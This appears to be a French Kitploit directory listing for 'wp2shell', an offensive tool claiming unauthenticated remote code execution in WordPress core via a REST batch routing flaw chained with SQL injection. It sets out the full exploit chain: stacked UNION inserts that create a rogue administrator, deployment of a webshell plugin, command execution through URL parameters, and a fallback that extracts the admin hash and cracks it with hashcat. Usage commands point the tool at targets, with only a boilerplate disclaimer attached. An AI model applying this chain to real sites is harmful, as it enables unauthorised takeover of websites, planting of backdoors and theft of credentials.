Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
wp2shell — RCE sans authentification dans le noyau WordPress (CVE-2026-63030 + CVE-2026-60137) | Kitploit
Outils/GitHubGitHub/iqbalx7/wp2shell
Cassage de Mots de PasseEscalade de PrivilègesGénération de PayloadsExploitationExploitation d'Applications WebRed TeamingSécurité des API
GitHubiqbalx7/wp2shell

wp2shell

RCE sans authentification dans le noyau WordPress (CVE-2026-63030 + CVE-2026-60137)

Voir le dépôt
6il y a 1 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

wp2shell

Exploite la confusion de routage de l'API REST de WordPress (CVE-2026-63030) + l'injection SQL (CVE-2026-60137) dans l'endpoint batch pour obtenir une exécution de code à distance.

Vulnérabilités

Confusion de routage (CVE-2026-63030)

L'endpoint batch de l'API REST de WordPress (/batch/v1) n'isole pas correctement le routage des requêtes. En imbriquant des requêtes batch les unes dans les autres, un attaquant peut émettre des requêtes internes qui contournent les contrôles de permission normaux de WordPress. L'indicateur clé est le schéma d'erreur parse_path_failed + block_cannot_read dans la réponse — cela confirme que la confusion de routage est exploitable.

Injection SQL (CVE-2026-60137)

Lorsqu'une requête est mal routée via l'endpoint batch, le paramètre author_exclude dans GET /wp/v2/posts n'est pas correctement assaini. Cela permet une injection SQL via des requêtes empilées et des instructions UNION — le tout sans authentification.

Comment fonctionne l'exploit

root@kitploit:~
Phase 1: Probe
  ─────────────
  Check batch endpoint reachable (HTTP 207)
  Verify route confusion via marker requests
  Confirm SQL injection via timing/oracle

Phase 2: UNION → RCE (fast path)
  ─────────────────────────────
  If UNION injection works:
    1. Detect table prefix (blind or brute-force common ones)
    2. CREATE ADMIN USER via stacked UNION INSERT queries
       - Bcrypt hash generated via PHP on attacker machine
       - Insert row into {prefix}_users + {prefix}_usermeta
       - New user gets administrator capabilities
    3. Login + Deploy webshell as WordPress plugin
    4. Execute commands via ?t=TOKEN&c=id

Phase 3: Blind → Hash (fallback path)
  ─────────────────────────────────
  If UNION is blocked but blind SQLi works:
    1. Extract MySQL version, user, database name
    2. Extract table prefix from information_schema
    3. Extract admin hash from {prefix}_users WHERE id=1
    4. Crack offline: hashcat -m 3200 hash.txt wordlist.txt
    5. Use --user / --pass --cmd id with cracked password

Phase 4: Credential login
  ──────────────────────
  If --user/--pass provided:
    1. Login via wp-login.php or REST API Basic Auth
    2. Upload webshell as plugin
    3. Execute commands

Utilisation

root@kitploit:~
# Auto mode — check, UNION, create admin, deploy webshell
python3 wp2shell.py https://target.com

# With known credentials (e.g., after cracking hash)
python3 wp2shell.py https://target.com --user admin --pass P@ssw0rd --cmd id

# UNION only (skip blind fallback)
python3 wp2shell.py https://target.com --union-only

# Blind extraction only (skip UNION attempt)
python3 wp2shell.py https://target.com --blind-only

# Debug via proxy
python3 wp2shell.py https://target.com --proxy http://127.0.0.1:8080

# Custom SLEEP duration for time-based blind (default 0.01s)
python3 wp2shell.py https://target.com --sleep 0.5

Options

Prérequis

  • Python 3.8+
  • PHP CLI (pour la génération de hash bcrypt — facultatif, se replie sur la valeur par défaut)
  • Cible : WordPress avec l'API REST activée et un endpoint batch non corrigé

Avertissement

Cet outil est destiné uniquement aux tests de sécurité autorisés. Vous devez avoir l'autorisation explicite du propriétaire de la cible avant de l'utiliser. L'accès non autorisé à des systèmes informatiques est illégal.

Télécharger l’outil
OptionDescription
--proxyProxy HTTP (ex. Burp Suite)
--userNom d'utilisateur admin pour la connexion
--passMot de passe admin
--cmdCommande à exécuter sur la cible
--union-onlyIgnorer l'extraction aveugle
--blind-onlyIgnorer la tentative UNION
--sleepSecondes de SLEEP pour l'injection aveugle basée sur le temps